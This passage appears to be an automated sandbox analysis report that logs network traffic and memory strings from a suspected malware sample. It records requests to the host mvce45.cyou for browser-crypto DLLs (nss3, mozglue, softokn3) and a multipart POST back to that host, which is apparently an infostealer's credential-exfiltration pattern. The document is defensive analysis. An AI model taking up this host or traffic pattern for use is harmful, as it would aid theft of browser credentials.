                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets2.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732805314&P2=404&P3=2&P4=ZlQSR0zSHDfjzUqjwz%2fxp3k4u3Td9XB4tbyEB84Gj9VYv7p9STdPutddM%2bTclRAlj3H4KOstpTJClMRVe3fjAQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: Jp9nUpfGNJUIQebNJEwkGCSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouConnection: Keep-AliveCache-Control: no-cache
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: t.me
                          Source: global trafficDNS traffic detected: DNS query: mvce45.cyou
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                          Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                          Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                          Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                          Source: global trafficDNS traffic detected: DNS query: c.msn.com
                          Source: global trafficDNS traffic detected: DNS query: api.msn.com
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: mvce45.cyouContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                          Source: chrome.exe, 00000007.00000003.2108120875.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109393710.00002FC000AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2109342103.00002FC0003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235954580.00006FE800378000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
